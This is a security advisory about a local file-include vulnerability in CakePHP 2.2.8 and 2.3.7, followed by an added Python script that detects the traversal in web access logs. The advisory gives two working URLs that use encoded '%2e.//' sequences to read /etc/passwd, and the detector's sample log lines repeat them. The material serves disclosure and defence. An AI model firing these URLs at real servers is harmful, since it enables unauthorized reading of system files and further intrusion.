source: https://www.securityfocus.com/bid/61746/info

CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.

CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected.

http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd

http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
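
A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory or of CakePHP: it percent-decodes each request path, collapses repeated slashes, and flags any `..` segment, which catches the `%2e.//` form that a literal `../` match misses. The function names, log lines and addresses are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def normalize(raw_path, max_rounds=3):
    """Percent-decode until stable (covers repeated encoding), then collapse '//'."""
    path = raw_path.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return re.sub(r"/{2,}", "/", path.replace("\\", "/"))

def is_traversal(raw_path):
    """True when the decoded path contains a '..' path segment."""
    return ".." in normalize(raw_path).split("/")

def escapes_prefix(raw_path, prefix):
    """True when the resolved path leaves the directory it was requested under."""
    resolved = posixpath.normpath(normalize(raw_path))
    return not (resolved + "/").startswith(prefix.rstrip("/") + "/")

def scan(log_lines):
    """Return (line_number, normalized_path) for every traversing request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group(1)):
            hits.append((number, normalize(match.group(1))))
    return hits

# Constructed sample log lines (documentation addresses, shortened paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2013:10:00:01 +0000] "GET /cakephp-2.3.7/theme/Test1/css/site.css HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Aug/2013:10:00:02 +0000] "GET /cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e./etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.10 - - [10/Aug/2013:10:00:03 +0000] "GET /cakephp-2.3.7/theme/Test1/js/app..min.js HTTP/1.1" 200 9001',
    '198.51.100.7 - - [10/Aug/2013:10:00:04 +0000] "GET /cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e./etc/passwd HTTP/1.1" 200 1843',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: traversal -> {path}")
```

A file name such as `app..min.js` is not flagged because the check compares whole path segments rather than searching for the substring `..`.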